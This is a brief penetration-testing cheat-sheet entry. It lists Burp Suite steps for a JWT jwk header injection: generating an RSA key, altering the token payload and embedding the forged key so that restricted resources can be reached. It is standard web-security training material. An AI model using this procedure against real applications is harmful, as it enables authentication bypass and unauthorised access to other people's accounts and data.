# JWT Change encryption key (jwk header injection)
- Send the request to Repeater in Burp Suite and ensure it contains a Token (JWT).
- Open the "JWT Editor" extension and generate a new RSA key by selecting "Generate" and then clicking "OK."
- Return to Repeater and open the "JSON Web Token" tab.
- Modify the payload to include the desired changes.
- Select the "Attack with Embedded JWK" option to replace the token's signature with your RSA key.
- Send the modified request and attempt to access restricted resources.

---------------------------------------------------------------------------------